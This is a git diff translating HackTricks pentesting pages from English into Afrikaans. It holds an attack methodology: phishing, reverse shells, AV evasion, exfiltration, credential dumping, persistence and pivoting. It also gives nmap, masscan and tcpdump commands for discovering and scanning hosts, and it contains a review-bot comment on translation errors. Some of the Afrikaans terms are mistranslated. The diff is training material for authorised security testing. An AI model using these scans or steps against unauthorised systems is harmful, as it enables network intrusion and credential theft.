Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin verdien belonings tot **$100,000**!\\ {% embed url="https://go.intigriti.com/hacktricks" %} ### 6- [Phishing](phishing-methodology/) -If at this point you haven't found any interesting vulnerability you **may need to try some phishing** in order to get inside the network. You can read my phishing methodology [here](phishing-methodology/): +As jy op hierdie punt nog geen interessante kwesbaarheid gevind het nie, **moet jy dalk 'n bietjie phishing probeer** om toegang tot die netwerk te kry. Jy kan my phishing-metodologie [hier](phishing-methodology/) lees: -### **7-** [**Getting Shell**](shells/) +### **7-** [**Kry 'n Skulpskoot**](shells/) -Somehow you should have found **some way to execute code** in the victim. Then, [a list of possible tools inside the system that you can use to get a reverse shell would be very useful](shells/). +Op een of ander manier moet jy 'n **manier gevind het om kode uit te voer** op die slagoffer. Dan sou 'n lys van moontlike gereedskap binne die stelsel wat jy kan gebruik om 'n omgekeerde skulpskoot te kry, baie nuttig wees](shells/). 
-Specially in Windows you could need some help to **avoid antiviruses**: [**Check this page**](../windows-hardening/av-bypass.md)**.**\\ +Veral in Windows mag jy dalk hulp nodig hê om **antivirusprogramme te vermy**: [**Kyk na hierdie bladsy**](../windows-hardening/av-bypass.md)**.**\\ -### 8- Inside +### 8- Binne -If you have troubles with the shell, you can find here a small **compilation of the most useful commands** for pentesters: +As jy probleme het met die skulpskoot, kan jy hier 'n klein **samestelling van die mees nuttige opdragte** vir pentesters vind: * [**Linux**](../linux-hardening/useful-linux-commands/) * [**Windows (CMD)**](../windows-hardening/basic-cmd-for-pentesters.md) -* [**Winodows (PS)**](../windows-hardening/basic-powershell-for-pentesters/) +* [**Windows (PS)**](../windows-hardening/basic-powershell-for-pentesters/) +### **9 -** [**Uitlekking**](exfiltration.md) -### **9 -** [**Exfiltration**](exfiltration.md) +Jy sal waarskynlik nodig hê om **data uit die slagoffer te onttrek** of selfs iets **in te voer** (soos voorregverhoging skripte). **Hier het jy 'n** [**pos oor algemene gereedskap wat jy met hierdie doeleindes kan gebruik**](exfiltration.md)**.** -You will probably need to **extract some data from the victim** or even **introduce something** (like privilege escalation scripts). 
**Here you have a** [**post about common tools that you can use with these purposes**](exfiltration.md)**.** +### **10- Voorregverhoging** -### **10- Privilege Escalation** +#### **10.1- Plaaslike Voorregverhoging** -#### **10.1- Local Privesc** +As jy **nie root/Administrator** binne die boks is nie, moet jy 'n manier vind om **voorregte te verhoog**.\ +Hier kan jy 'n **gids vind om voorregte plaaslik te verhoog in** [**Linux**](../linux-hardening/privilege-escalation/) **en in** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)**.**\ +Jy moet ook hierdie bladsye oor hoe **Windows werk** nagaan: -If you are **not root/Administrator** inside the box, you should find a way to **escalate privileges.**\ -Here you can find a **guide to escalate privileges locally in** [**Linux**](../linux-hardening/privilege-escalation/) **and in** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)**.**\ -You should also check this pages about how does **Windows work**: +* [**Verifikasie, Legitieme Inligting, Token-voorregte en UAC**](../windows-hardening/authentication-credentials-uac-and-efs.md) +* Hoe werk [**NTLM**](../windows-hardening/ntlm/) +* Hoe om [**legitieme inligting te steel**](broken-reference/) in Windows +* 'n Paar truuks oor [_**Aktiewe Gids**_](../windows-hardening/active-directory-methodology/) -* [**Authentication, Credentials, Token privileges and UAC**](../windows-hardening/authentication-credentials-uac-and-efs.md) -* How does [**NTLM works**](../windows-hardening/ntlm/) -* How to [**steal credentials**](broken-reference/) in Windows -* Some tricks about [_**Active Directory**_](../windows-hardening/active-directory-methodology/) +**Moenie vergeet om die beste gereedskap om Windows en Linux plaaslike Voorregverhoging-paaie op te som nie:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) -**Don't forget to checkout the best tools to enumerate Windows and Linux local Privilege 
Escalation paths:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) +#### **10.2- Domein Voorregverhoging** -#### **10.2- Domain Privesc** - -Here you can find a [**methodology explaining the most common actions to enumerate, escalate privileges and persist on an Active Directory**](../windows-hardening/active-directory-methodology/). Even if this is just a subsection of a section, this process could be **extremely delicate** on a Pentesting/Red Team assignment. +Hier kan jy 'n [**metodologie vind wat die mees algemene aksies verduidelik om te ondersoek, voorregte te verhoog en volhardend te wees in 'n Aktiewe Gids**](../windows-hardening/active-directory-methodology/). Selfs al is dit net 'n subafdeling van 'n afdeling, kan hierdie proses **uiters delikaat** wees in 'n Pentesting/Red Team-opdrag. ### 11 - POST -#### **11**.1 - Looting +#### **11**.1 - Plundering -Check if you can find more **passwords** inside the host or if you have **access to other machines** with the **privileges** of your **user**.\ -Find here different ways to [**dump passwords in Windows**](broken-reference/). +Kyk of jy meer **wagwoorde** binne die gasheer kan vind of as jy **toegang het tot ander masjiene** met die **voorregte** van jou **gebruiker**.\ +Vind hier verskillende maniere om [**wagwoorde in Windows te dump**](broken-reference/). 
-#### 11.2 - Persistence +#### 11.2 - Volharding -**Use 2 o 3 different types of persistence mechanism so you won't need to exploit the system again.**\ -**Here you can find some** [**persistence tricks on active directory**](../windows-hardening/active-directory-methodology/#persistence)**.** +**Gebruik 2 of 3 verskillende tipes volhardingsmeganismes sodat jy nie weer die stelsel hoef te benut nie.**\ +**Hier kan jy 'n paar** [**volhardingstruuks in 'n aktiewe gids vind**](../windows-hardening/active-directory-methodology/#persistence)**.** -TODO: Complete persistence Post in Windows & Linux +TODO: Voltooi volhardingspos in Windows & Linux ### 12 - Pivoting -With the **gathered credentials** you could have access to other machines, or maybe you need to **discover and scan new hosts** (start the Pentesting Methodology again) inside new networks where your victim is connected.\ -In this case tunnelling could be necessary. Here you can find [**a post talking about tunnelling**](tunneling-and-port-forwarding.md).\ -You definitely should also check the post about [Active Directory pentesting Methodology](../windows-hardening/active-directory-methodology/). There you will find cool tricks to move laterally, escalate privileges and dump credentials.\ -Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be very useful to pivot on Windows environments.. +Met die **versamelde legitimasie** kan jy toegang hê tot ander masjiene, of miskien moet jy **nuwe gasheer ontdek en skandeer** (begin die Pentesting Metodologie weer) binne nuwe netwerke waar jou slagoffer gekoppel is.\ +In hierdie geval kan tunnelling nodig wees. Hier kan jy [**'n pos vind wat oor tunnelling praat**](tunneling-and-port-forwarding.md).\ +Jy moet beslis ook die pos oor [Aktiewe Gids pentesting Metodologie](../windows-hardening/active-directory-methodology/) nagaan. 
Daar sal jy koel truuks vind om lateraal te beweeg, voorregte te verhoog en legitimasie te dump.\ +Kyk ook na die bladsy oor [**NTLM**](../windows-hardening/ntlm/), dit kan baie nuttig wees om te pivoteer in Windows-omgewings.. -### MORE +### MEER -#### [Android Applications](../mobile-pentesting/android-app-pentesting/) +#### [Android-toepassings](../mobile-pentesting/android-app-pentesting/) -#### **Exploiting** +#### **Uitbuiting** -* [**Basic Linux Exploiting**](../exploiting/linux-exploiting-basic-esp/) -* [**Basic Windows Exploiting**](../exploiting/windows-exploiting-basic-guide-oscp-lvl.md) -* [**Basic exploiting tools**](../exploiting/tools/) +* [**Basiese Linux-uitbuiting**](../exploiting/linux-exploiting-basic-esp/) +* [**Basiese Windows-uitbuiting**](../exploiting/windows-exploiting-basic-guide-oscp-lvl.md) +* [**Basiese uitbuitingsgereedskap**](../exploiting/tools/) -#### [**Basic Python**](python/) +#### [**Basiese Python**](python/) -#### **Crypto tricks** +#### **Krypto-truuks** * [**ECB**](../cryptography/electronic-code-book-ecb.md) * [**CBC-MAC**](../cryptography/cipher-block-chaining-cbc-mac-priv.md) * [**Padding Oracle**](../cryptography/padding-oracle-priv.md) \ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings tot **$100,000** te verdien! {% embed url="https://go.intigriti.com/hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
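Review bot: the `+` line for section 7 drops the opening `[` of the second link: `Dan sou 'n lys van moontlike gereedskap binne die stelsel ... baie nuttig wees](shells/).` leaves a stray `](shells/)` and no rendered link, where the `-` line had `[a list of possible tools inside the system ... would be very useful](shells/)`; put the bracket back before `'n lys`. Two terminology points in the same hunk: `### **7-** [**Kry 'n Skulpskoot**](shells/)` and the later `omgekeerde skulpskoot` render "shell" as "shell-shot", and `Aktiewe Gids` translates the product name Active Directory; both are terms an Afrikaans reader looks up in English, so keep `shell` and `Active Directory` untranslated, as the link targets `shells/` and `active-directory-methodology/` already do. `Moenie vergeet om die beste gereedskap ... op te som nie` also loses the verb of `Don't forget to checkout the best tools`; `Moenie vergeet om ... na te gaan nie` keeps the meaning.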
diff --git a/generic-methodologies-and-resources/pentesting-network/README.md b/generic-methodologies-and-resources/pentesting-network/README.md index 65223ce6e..fb26aa884 100644 --- a/generic-methodologies-and-resources/pentesting-network/README.md +++ b/generic-methodologies-and-resources/pentesting-network/README.md @@ -1,96 +1,85 @@ -# Pentesting Network +# Pentesting Netwerk
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty-tippie**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers vir hackers geskep is**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin verdien belonings tot **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} -## Discovering hosts from the outside +## Ontdekking van gasheer van buite af -This is going to be a **brief section** about how to find **IPs responding** from the **Internet**.\ -In this situation you have some **scope of IPs** (maybe even several **ranges**) and you just to find **which IPs are responding**. +Dit is 'n **kort afdeling** oor hoe om **IP's te vind wat reageer** vanaf die **Internet**.\ +In hierdie situasie het jy 'n **omvang van IP's** (miskien selfs verskeie **reekse**) en jy wil net uitvind **watter IP's reageer**. ### ICMP -This is the **easiest** and **fastest** way to discover if a host is up or not.\ -You could try to send some **ICMP** packets and **expect responses**. The easiest way is just sending an **echo request** and expect from the response. You can do that using a simple `ping`or using `fping`for **ranges**.\ -You could also use **nmap** to send other types of ICMP packets (this will avoid filters to common ICMP echo request-response). - +Dit is die **maklikste** en **vinnigste** manier om uit te vind of 'n gasheer aktief is of nie.\ +Jy kan probeer om 'n paar **ICMP-pakette te stuur** en **verwag antwoorde**. Die maklikste manier is om net 'n **echo-versoek** te stuur en 'n antwoord te verwag. 
Jy kan dit doen deur 'n eenvoudige `ping` te gebruik of deur `fping` te gebruik vir **reekse**.\ +Jy kan ook **nmap** gebruik om ander tipes ICMP-pakette te stuur (dit sal filters vir gewone ICMP-echo-versoek-antwoord vermy). ```bash ping -c 1 199.66.11.4 # 1 echo request to a host fping -g 199.66.11.0/24 # Send echo requests to ranges nmap -PE -PM -PP -sn -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests ``` +### TCP Poort Ontdekking -### TCP Port Discovery - -It's very common to find that all kind of ICMP packets are being filtered. Then, all you can do to check if a host is up is **try to find open ports**. Each host has **65535 ports**, so, if you have a "big" scope you **cannot** test if **each port** of each host is open or not, that will take too much time.\ -Then, what you need is a **fast port scanner** ([masscan](https://github.com/robertdavidgraham/masscan)) and a list of the **ports more used:** - +Dit is baie algemeen om te vind dat alle soorte ICMP-pakette gefiltreer word. Dan kan jy slegs **probeerslag om oop poorte te vind** om te kyk of 'n gasheer aktief is. Elke gasheer het **65535 poorte**, so as jy 'n "groot" omvang het, kan jy nie toets of **elke poort** van elke gasheer oop of toe is nie, dit sal te veel tyd neem.\ +Wat jy nodig het, is 'n **vinnige poortskander** ([masscan](https://github.com/robertdavidgraham/masscan)) en 'n lys van die **mees gebruikte poorte:** ```bash #Using masscan to scan top20ports of nmap in a /24 range (less than 5min) masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 199.66.11.0/24 ``` +Jy kan hierdie stap ook met `nmap` uitvoer, maar dit is stadiger en `nmap` het probleme om gasheerstelsels op te spoor. -You could also perform this step with `nmap`, but it slower and somewhat `nmap`has problems identifying hosts up. 
- -### HTTP Port Discovery - -This is just a TCP port discovery useful when you want to **focus on discovering HTTP** **services**: +### HTTP Poort Ontdekking +Dit is net 'n TCP-poortontdekking wat nuttig is wanneer jy wil fokus op die ontdekking van HTTP-diens. ```bash masscan -p80,443,8000-8100,8443 199.66.11.0/24 ``` +### UDP Poort Ontdekking -### UDP Port Discovery - -You could also try to check for some **UDP port open** to decide if you should **pay more attention** to a **host.** As UDP services usually **don't respond** with **any data** to a regular empty UDP probe packet it is difficult to say if a port is being filtered or open. The easiest way to decide this is to send a packet related to the running service, and as you don't know which service is running, you should try the most probable based on the port number: - +Jy kan ook probeer om te kyk vir sommige **UDP-poorte wat oop is** om te besluit of jy meer aandag aan 'n **gasheer** moet gee. Aangesien UDP-diens gewoonlik **nie reageer** met **enige data** op 'n gewone leë UDP-probe-pakket nie, is dit moeilik om te sê of 'n poort gefiltreer of oop is. Die maklikste manier om dit te besluit, is om 'n pakket te stuur wat verband hou met die lopende diens, en aangesien jy nie weet watter diens loop nie, moet jy die mees waarskynlike probeer gebaseer op die poortnommer: ```bash nmap -sU -sV --version-intensity 0 -F -n 199.66.11.53/24 # The -sV will make nmap test each possible known UDP service packet # The "--version-intensity 0" will make nmap only test the most probable ``` +Die nmap-lyn wat voorheen voorgestel is, sal die **top 1000 UDP-poorte** toets in elke gasheer binne die **/24**-reeks, maar selfs dit sal **>20 minute** neem. 
As jy **vinnigste resultate** benodig, kan jy [**udp-proto-scanner**](https://github.com/portcullislabs/udp-proto-scanner) gebruik: `./udp-proto-scanner.pl 199.66.11.53/24` Dit sal hierdie **UDP-ondersoeke** na hul **verwagte poort** stuur (vir 'n /24-reeks sal dit net 1 minuut neem): _DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, RPCCheck, SNMPv3GetRequest, chargen, citrix, daytime, db2, echo, gtpv1, ike,ms-sql, ms-sql-slam, netop, ntp, rpc, snmp-public, systat, tftp, time, xdmcp._ -The nmap line proposed before will test the **top 1000 UDP ports** in every host inside the **/24** range but even only this will take **>20min**. If need **fastest results** you can use [**udp-proto-scanner**](https://github.com/portcullislabs/udp-proto-scanner): `./udp-proto-scanner.pl 199.66.11.53/24` This will send these **UDP probes** to their **expected port** (for a /24 range this will just take 1 min): _DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, RPCCheck, SNMPv3GetRequest, chargen, citrix, daytime, db2, echo, gtpv1, ike,ms-sql, ms-sql-slam, netop, ntp, rpc, snmp-public, systat, tftp, time, xdmcp._ - -### SCTP Port Discovery - +### SCTP Poort Ontdekking ```bash #Probably useless, but it's pretty fast, why not trying? nmap -T4 -sY -n --open -Pn ``` - ## Pentesting Wifi -Here you can find a nice guide of all the well known Wifi attacks at the time of the writing: +Hier kan jy 'n goeie gids vind van al die bekende Wifi-aanvalle op die tydstip van die skryf: {% content-ref url="../pentesting-wifi/" %} [pentesting-wifi](../pentesting-wifi/) {% endcontent-ref %} -## Discovering hosts from the inside +## Ontdekking van gasheer van binne -If you are inside the network one of the first things you will want to do is to **discover other hosts**. Depending on **how much noise** you can/want to do, different actions could be performed: +As jy binne die netwerk is, is een van die eerste dinge wat jy wil doen, om **ander gasheer** te ontdek. 
Afhangende van **hoeveel geraas** jy kan/wil maak, kan verskillende aksies uitgevoer word: -### Passive - -You can use these tools to passively discover hosts inside a connected network: +### Passief +Jy kan hierdie hulpmiddels gebruik om gasheer passief binne 'n gekoppelde netwerk te ontdek: ```bash netdiscover -p p0f -i eth0 -p -o /tmp/p0f.log @@ -99,12 +88,10 @@ net.recon on/off #Read local ARP cache periodically net.show set net.show.meta true #more info ``` +### Aktief -### Active - -Note that the techniques commented in [_**Discovering hosts from the outside**_](./#discovering-hosts-from-the-outside) (_TCP/HTTP/UDP/SCTP Port Discovery_) can be also **applied here**.\ -But, as you are in the **same network** as the other hosts, you can do **more things**: - +Let daarop dat die tegnieke wat in [_**Ontdekking van gasheer van buite af**_](./#ontdekking-van-gasheer-van-buite-af) (_TCP/HTTP/UDP/SCTP-poortontdekking_) bespreek word, hier ook **toegepas kan word**.\ +Maar, aangesien jy in dieselfde netwerk as die ander gasheer is, kan jy **meer dinge doen**: ```bash #ARP discovery nmap -sn #ARP Requests (Discover IPs) 
@@ -124,103 +111,93 @@ set net.probe.throttle 10 #10ms between probes sent (default=10) #IPv6 alive6 # Send a pingv6 to multicast. ``` +### Aktiewe ICMP -### Active ICMP +Let daarop dat die tegnieke wat in _Ontdekking van gasheer van buite_ ([_**ICMP**_](./#icmp)) bespreek word, ook hier **toegepas kan word**.\ +Maar, aangesien jy in dieselfde netwerk as die ander gasheer is, kan jy **meer dinge doen**: -Note that the techniques commented in _Discovering hosts from the outside_ ([_**ICMP**_](./#icmp)) can be also **applied here**.\ -But, as you are in the **same network** as the other hosts, you can do **more things**: - -* If you **ping** a **subnet broadcast address** the ping should be arrive to **each host** and they could **respond** to **you**: `ping -b 10.10.5.255` -* Pinging the **network broadcast address** you could even find hosts inside **other subnets**: `ping -b 255.255.255.255` -* Use the `-PE`, `-PP`, `-PM` flags of `nmap`to perform host discovery sending respectively **ICMPv4 echo**, **timestamp**, and **subnet mask requests:** `nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24` +* As jy 'n **subnet-uitsaai-adres ping**, moet die ping na **elke gasheer** aankom en hulle kan aan **jou antwoord**: `ping -b 10.10.5.255` +* Deur die **netwerk-uitsaai-adres te ping**, kan jy selfs gasheer binne **ander subnets** vind: `ping -b 255.255.255.255` +* Gebruik die `-PE`, `-PP`, `-PM` vlae van `nmap` om gasheerontdekking uit te voer deur onderskeidelik **ICMPv4-echo**, **tydstempel** en **subnetmaskerversoeke** te stuur: `nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24` ### **Wake On Lan** -Wake On Lan is used to **turn on** computers through a **network message**. 
The magic packet used to turn on the computer is only a packet where a **MAC Dst** is provided and then it is **repeated 16 times** inside the same paket.\ -Then this kind of packets are usually sent in an **ethernet 0x0842** or in a **UDP packet to port 9**.\ -If **no \[MAC]** is provided, the packet is sent to **broadcast ethernet** (and the broadcast MAC will be the one being repeated). - +Wake On Lan word gebruik om rekenaars aan te **skakel** deur middel van 'n **netwerkboodskap**. Die sielkundige pakkie wat gebruik word om die rekenaar aan te skakel, is slegs 'n pakkie waarin 'n **MAC Dst** verskaf word en dit dan **16 keer herhaal** word binne dieselfde pakkie.\ +Hierdie tipe pakkies word gewoonlik gestuur in 'n **ethernet 0x0842** of in 'n **UDP-pakkie na poort 9**.\ +As **geen \[MAC]** verskaf word nie, word die pakkie gestuur na **uitsaai-ethernet** (en die uitsaai-MAC sal herhaal word). ```bash # Bettercap (if no [MAC] is specificed ff:ff:ff:ff:ff:ff will be used/entire broadcast domain) wol.eth [MAC] #Send a WOL as a raw ethernet packet of type 0x0847 wol.udp [MAC] #Send a WOL as an IPv4 broadcast packet to UDP port 9 ``` +## Skandering van Gasheer -## Scanning Hosts - -Once you have discovered all the IPs (external or internal) you want to scan in depth, different actions can be performed. +Sodra jy al die IP-adresse (eksterne of interne) ontdek het wat jy in diepte wil skandeer, kan verskillende aksies uitgevoer word. 
### TCP -* **Open** port: _SYN --> SYN/ACK --> RST_ -* **Closed** port: _SYN --> RST/ACK_ -* **Filtered** port: _SYN --> \[NO RESPONSE]_ -* **Filtered** port: _SYN --> ICMP message_ - +* **Oop** poort: _SYN --> SYN/ACK --> RST_ +* **Geslote** poort: _SYN --> RST/ACK_ +* **Gefiltreerde** poort: _SYN --> \[GEEN REAKSIE]_ +* **Gefiltreerde** poort: _SYN --> ICMP-boodskap_ ```bash # Nmap fast scan for the most 1000tcp ports used -nmap -sV -sC -O -T4 -n -Pn -oA fastscan +nmap -sV -sC -O -T4 -n -Pn -oA fastscan # Nmap fast scan for all the ports -nmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan +nmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan # Nmap fast scan for all the ports slower to avoid failures due to -T4 nmap -sV -sC -O -p- -n -Pn -oA fullscan #Bettercap Scan syn.scan 192.168.1.0/24 1 10000 #Ports 1-10000 ``` - ### UDP -There are 2 options to scan an UDP port: +Daar is 2 opsies om 'n UDP-poort te skandeer: -* Send a **UDP packet** and check for the response _**ICMP unreachable**_ if the port is **closed** (in several cases ICMP will be **filtered** so you won't receive any information inf the port is close or open). -* Send a **formatted datagrams** to elicit a response from a **service** (e.g., DNS, DHCP, TFTP, and others, as listed in _nmap-payloads_). If you receive a **response**, then, the port is **open**. - -**Nmap** will **mix both** options using "-sV" (UDP scans are very slow), but notice that UDP scans are slower than TCP scans: +* Stuur 'n **UDP-pakket** en kyk vir die respons _**ICMP onbereikbaar**_ as die poort **gesluit** is (in verskeie gevalle sal ICMP **gefilter** word, sodat jy geen inligting sal ontvang as die poort oop of toe is nie). +* Stuur 'n **geformateerde datagram** om 'n respons van 'n **diens** (bv. DNS, DHCP, TFTP, en ander, soos gelys in _nmap-payloads_) uit te lok. As jy 'n **respons** ontvang, dan is die poort **oop**. 
+**Nmap** sal **beide opsies meng** deur gebruik te maak van "-sV" (UDP-skanderings is baie stadig), maar let daarop dat UDP-skanderings stadiger as TCP-skanderings is: ```bash # Check if any of the most common udp services is running -udp-proto-scanner.pl +udp-proto-scanner.pl # Nmap fast check if any of the 100 most common UDP services is running nmap -sU -sV --version-intensity 0 -n -F -T4 # Nmap check if any of the 100 most common UDP services is running and launch defaults scripts -nmap -sU -sV -sC -n -F -T4 +nmap -sU -sV -sC -n -F -T4 # Nmap "fast" top 1000 UDP ports nmap -sU -sV --version-intensity 0 -n -T4 # You could use nmap to test all the UDP ports, but that will take a lot of time ``` +### SCTP Skandering -### SCTP Scan +**SCTP (Stream Control Transmission Protocol)** is ontwerp om saam met **TCP (Transmission Control Protocol)** en **UDP (User Datagram Protocol)** gebruik te word. Dit is hoofsaaklik ontwerp om die vervoer van telefonie data oor IP-netwerke te fasiliteer, deur baie van die betroubaarheidskenmerke wat in **Signaling System 7 (SS7)** gevind word, na te boots. **SCTP** is 'n kernkomponent van die **SIGTRAN**-protokolfamilie, wat daarop gemik is om SS7-seine oor IP-netwerke te vervoer. -**SCTP (Stream Control Transmission Protocol)** is designed to be used alongside **TCP (Transmission Control Protocol)** and **UDP (User Datagram Protocol)**. Its main purpose is to facilitate the transport of telephony data over IP networks, mirroring many of the reliability features found in **Signaling System 7 (SS7)**. **SCTP** is a core component of the **SIGTRAN** protocol family, which aims to transport SS7 signals over IP networks. - -The support for **SCTP** is provided by various operating systems, such as **IBM AIX**, **Oracle Solaris**, **HP-UX**, **Linux**, **Cisco IOS**, and **VxWorks**, indicating its broad acceptance and utility in the field of telecommunication and networking. 
- -Two different scans for SCTP are offered by nmap: _-sY_ and _-sZ_ +Ondersteuning vir **SCTP** word verskaf deur verskeie bedryfstelsels, soos **IBM AIX**, **Oracle Solaris**, **HP-UX**, **Linux**, **Cisco IOS**, en **VxWorks**, wat dui op die breë aanvaarding en bruikbaarheid daarvan in die veld van telekommunikasie en netwerke. +Nmap bied twee verskillende skanderings vir SCTP aan: _-sY_ en _-sZ_ ```bash # Nmap fast SCTP scan nmap -T4 -sY -n -oA SCTFastScan # Nmap all SCTP scan nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan ``` - -### IDS and IPS evasion +### IDS en IPS ontduiking {% content-ref url="ids-evasion.md" %} [ids-evasion.md](ids-evasion.md) {% endcontent-ref %} -### **More nmap options** +### **Meer nmap opsies** {% content-ref url="nmap-summary-esp.md" %} [nmap-summary-esp.md](nmap-summary-esp.md) {% endcontent-ref %} -### Revealing Internal IP Addresses - -**Misconfigured routers, firewalls, and network devices** sometimes respond to network probes using **nonpublic source addresses**. **tcpdump** can be utilized to identify packets received from private addresses during testing. Specifically, on Kali Linux, packets can be captured on the **eth2 interface**, which is accessible from the public Internet. It's important to note that if your setup is behind a NAT or a Firewall, such packets are likely to be filtered out. +### Onthulling van interne IP-adresse +**Verkeerd gekonfigureerde roetings, brandmuure en netwerktoestelle** reageer soms op netwerkondersoeke met behulp van **nie-publieke bronadresse**. **tcpdump** kan gebruik word om pakkies te identifiseer wat ontvang word vanaf private adresse tydens toetsing. Spesifiek op Kali Linux kan pakkies opgevang word op die **eth2-koppelvlak**, wat toeganklik is vanaf die openbare internet. Dit is belangrik om daarop te let dat as jou opset agter 'n NAT of 'n brandmuur is, sulke pakkies waarskynlik gefiltreer sal word. 
```bash tcpdump –nt -i eth2 src net 10 or 172.16/12 or 192.168/16 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode 
@@ -228,30 +205,50 @@ listening on eth2, link-type EN10MB (Ethernet), capture size 65535 bytes IP 10.10.0.1 > 185.22.224.18: ICMP echo reply, id 25804, seq 1582, length 64 IP 10.10.0.2 > 185.22.224.18: ICMP echo reply, id 25804, seq 1586, length 64 ``` +## Snuffel -## Sniffing +Snuffel kan jy besonderhede van IP-reekse, subnetgroottes, MAC-adresse en hostnames leer deur vasgevangde raamwerke en pakkies te hersien. As die netwerk verkeerd geconfigureer is of die skakelstof onder druk is, kan aanvallers sensitiewe materiaal vasvang deur passiewe netwerk snuffelwerk. -Sniffing you can learn details of IP ranges, subnet sizes, MAC addresses, and hostnames by reviewing captured frames and packets. If the network is misconfigured or switching fabric under stress, attackers can capture sensitive material via passive network sniffing. - -If a switched Ethernet network is configured properly, you will only see broadcast frames and material destined for your MAC address. +As 'n geskakelde Ethernet-netwerk behoorlik gekonfigureer is, sal jy slegs uitsaai-raamwerke en materiaal sien wat bestem is vir jou MAC-adres. ### TCPDump - ```bash sudo tcpdump -i udp port 53 #Listen to DNS request to discover what is searching the host tcpdump -i icmp #Listen to icmp packets sudo bash -c "sudo nohup tcpdump -i eth0 -G 300 -w 